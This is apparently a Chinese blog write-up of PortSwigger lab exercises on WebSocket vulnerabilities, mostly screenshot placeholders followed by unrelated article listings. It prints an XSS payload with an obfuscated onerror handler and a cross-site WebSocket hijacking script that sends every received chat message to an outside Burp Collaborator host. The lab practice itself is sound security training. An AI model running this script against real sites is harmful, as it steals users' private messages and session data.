burpsuit 靶场(WebSockets)

最新推荐文章于 2024-01-24 16:32:46 发布
最新推荐文章于 2024-01-24 16:32:46 发布
阅读量209 收藏
点赞数
文章标签: websocket 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63303407/article/details/128750128
版权

操纵 WebSocket 消息以利用漏洞

image-20221224185944974

image-20221224190032904

可见websocket通信

image-20221224190920386

image-20221224190933965

image-20221224191205256

操纵 WebSocket 握手以利用漏洞

image-20221224192044916

image-20221224192830437

做了过滤并且切断了连接

image-20221224193034250

尝试重新连接 但是发现 地址被过滤了

image-20221224193405422

<img src=1 oNeRrOr=alert`1`>

image-20221224193442241

<script>
    var ws = new WebSocket('wss://0ae0005c0315701cc023ea1c000e00f2.web-security-academy.net/chat');
    //发起一个 wss 对话
    ws.onopen = function() {
        ws.send("READY");
        //连接建立起来之后会触发 onopen() 事件处理程序 它向服务器发送READY消息
    };
    ws.onmessage = function(event) {
        //放消息发送给客户端时会触发 ws.onmessage事件处理
        fetch('https://vfeanq3yvfqf8kqiq1ole0x4vv1mpcd1.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
        //向coolaborator 发送消息内容
    };
</script>

image-20221224195152385

image-20221224195309143

image-20221224195408379

image-20221224195422362

image-20221224195439836

wanan0red
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php-websockets
07-31
php-websockets
Delphi_Websockets.zip
03-03
DelphiWebsockets 很难得的控件
LabVIEW-WebSockets-API-master.zip
07-23
LabVIEW-WebSockets
WebSockets.zip
09-07
WebSockets.zip
最简易websockets-demo
01-17
WebSocket协议是基于TCP的一种新的网络协议。它实现了浏览器与服务器全双工(full-duplex)通信——允许服务器主动发送信息给客户端。本代码是用Java开发的最简易的websocket的demo
websocket 跨域_靶场直播疯狂作死之WebSocket 跨域劫持漏洞实战与修复
weixin_39772420的博客
01-26 397
前言作者:Vulkey_Chen责任编辑:白袍听说团长他们把社区的铸剑靶场做了直播!在线日靶机!还TM有弹幕!还有妹子!关键还不带上我。。。吸引了一堆大佬互相商业互吹!关键又不带上我。。。直播开始了 蔡徐坤都上了,还没有喊我。。仔细研究了团长朋友圈炫的图,我大胆推测弹幕系统肯定使用的是WebSocket协议,于是我对WebSocket协议进行了深度了解后制定了一个大胆的计划。...
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
liaomin416100569的专栏
12-13 9700
渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
01-17 1万+
BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
Web安全 — BurpSuite实战
天地沧海
01-28 1016
https://www.freebuf.com/column/155797.html https://www.freebuf.com/column/156238.html burp简介 Burp Suite是Web应用程序测试的最佳工具之一,可以对请求的数据包进行拦截和修改,扫描常见的web安全漏洞,暴力破解登录表单、遍历数据等等。 Burp所需环境 Burp Suite是Java编写的...
Burp Suite无法监听到WebSocket流量的一个愚蠢的原因
克格莫
07-23 4040
根据其在官网的说法,只需要配置好了代理,WebSocket的请求是可以监听到的,而且不再需要做其他额外的配置: 但我尝试监听Websocket请求的时候,Omega报错:部分资源加载失败,然后请求也发不出去,抓包直接抓不到相关数据包。 所以猜测是burp的版本过低,虽然其1.6版本也有所谓的Websocket History,但是根本没用。 所以我这次直接上最新版的Burp,然后就监听到了websocket的流量: 而且新版还能对websocket的请求进行重放了,非常好。 ...
浅析websocket劫持
蚁景网安学院
07-15 985
WebSocket是HTML5推出的新协议,是基于TCP的应用层通信协议,它与http协议内容本身没有关系。WebSocket 也类似于 TCP 一样进行握手连接,跟 TCP 不同的是,WebSocket 是基于 HTTP 协议进行的握手,它在客户端和服务器之间提供了一个基于单 TCP 连接的高效全双工通信信道......
反序列化分析到shiro注入WebSocket内存马
weixin_42508548的博客
01-30 863
因为一直想要学习反序列化相关的内容,并且从反序列化延伸出来学习内存马,所以花了很大一部分精力,从CC1到CB,整体地过了一遍反序列化利用链。在学习过程中,发现一个很有意思的内存马,WebSocket内存马,感觉如果用的好的话,挺符合实际需要的,所以自己大体利用了一下,很成功,在这里整理分享出来。
burp靶场--WebSockets安全漏洞
qq_33168924的博客
01-24 1374
在Burp代理的HTTP历史记录选项卡中,找到WebSocket握手请求。观察请求是否没有CSRF令牌。凭据:carlos: fj83hbdbohtky68riu8b。右键单击握手请求并选择"复制URL"
Burp Suite配合xray代理socks流量
Qeminco的博客。
09-17 3509
一、配置xray中config.yaml文件中proxy字段 socks5://用户名:密码@ip:端口 二、Burp Suite配置socks代理 User options中找到socks proxy 三、xray开启监听端口 四、浏览器开启代理端口 我的xray监听的是http://127.0.0.1:7777 所以浏览器代理也是http://127.0.0.1:7777 ...
Burp Suite 中的常见错误故障排除
goldksoft的博客
01-12 1万+
Burp不运行 尝试从命令行启动 Burp。查看出现在命令行上的任何错误消息或其他输出,它们应该指出问题的原因。我收到一条错误消息,指出 NoClassDefFoundError 从命令行运行 Burp 时,请确保包含-jar参数后跟 Burp JAR 文件的位置。如果您仍然遇到问题,请检查您的命令是否正在启动正确版本的 Java。运行该命令java -version并确认执行的版本为1.8或更高版本。如果您安装了较新版本的 Java,但仍在执行较旧版本,请将“java”替换为系统上正确 java 可执行文
BurpSuite系列(一)----Proxy模块(代理模块)
热门推荐
fendo
01-15 2万+
一、简介 Proxy代理模块作为BurpSuite的核心功能,拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。 Burp 代理允许你通过监视和操纵应用程序传输的关键参数和其他数据来查找和探索应用程序的漏洞。通过以恶意的方式修改浏览器的请求,Burp 代理可以用来进行攻击,如:SQL 注入,cookie
WebSockets应用安全
balance的博客
07-05 793
一、WebSockets应用场景 在Html5的WebSockets标准未出现之前,服务器是通过客户端(浏览器)轮询,来达到“推送消息”效果的,此方法低效且浪费资源 WebSockets在客户端(浏览器)和服务器之间建立TCP 持久连接,进行双向通信。http是请求响应机制(问-答,浏览器端发出请求,服务器端响应),而websocket使得浏览器与服务器建立起对话机制,双方都可以问和答。服务器...
websocket安全分析
lakeyoursll的博客
11-17 1万+
摘要 WebSocketweb应用和服务提供了双向实时通信信道,这篇论文概述了Websocket协议和这个API,并且描述了它提供的便利。本文的主要贡献是回顾和分析了与WS相关的安全问题,讨论了可能的解决方法以及部署WS的最佳实践。同样,这篇论文提出了在web浏览器中应该有一些安全的特性去余额宝用户的安全。浏览器供应商在提供安全特性方面充当着重要角色。WS至今还没有标准化,但是WS的利用会
Burp Suite Pro(黑客必备工具详解)
weixin_50904074的博客
06-29 10000
目录一、Burp Suite Pro 工具简介二、Burp Suite 常用模块详解和使用1、Dashboard(仪表盘,用于显示任务、日志信息、漏洞扫描信息等) 1.1 Tasks 1.2 lssue activity1.3 Event log 2、Target(目标)2.1 Site map(站点地图)2.2 Scope(范围)2.3 lssue definitions(漏洞详解) 3、Proxy(代理)3.1 Intercept(数据拦截模块)3.2 HTTP histor
websockets
最新发布
03-09
WebSockets是一种在Web浏览器和服务器之间进行全双工通信的技术。它允许服务器主动向客户端推送数据,而不需要客户端发起请求。相比传统的HTTP请求-响应模式,WebSockets提供了更低的延迟和更高的实时性。 WebSockets的工作原理是通过在客户端和服务器之间建立一个持久化的连接,该连接可以保持打开状态,以便双方可以随时发送和接收数据。这种持久化连接是通过HTTP协议的升级实现的,即从HTTP协议升级到WebSocket协议。 使用WebSockets可以实现实时聊天、实时数据更新、实时通知等功能。它在许多领域都有广泛的应用,如在线游戏、股票交易、即时通讯等。 WebSockets的特点包括: 1. 实时性:WebSockets提供了低延迟和高实时性的通信方式,可以快速地将数据推送给客户端。 2. 双向通信:WebSockets允许服务器主动向客户端发送数据,而不仅仅是响应客户端的请求。 3. 轻量级:WebSockets使用较少的网络流量和资源,因为它使用了持久化连接,避免了频繁的HTTP请求和响应。 4. 跨平台:WebSockets可以在各种平台和设备上使用,包括Web浏览器、移动应用和服务器端。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值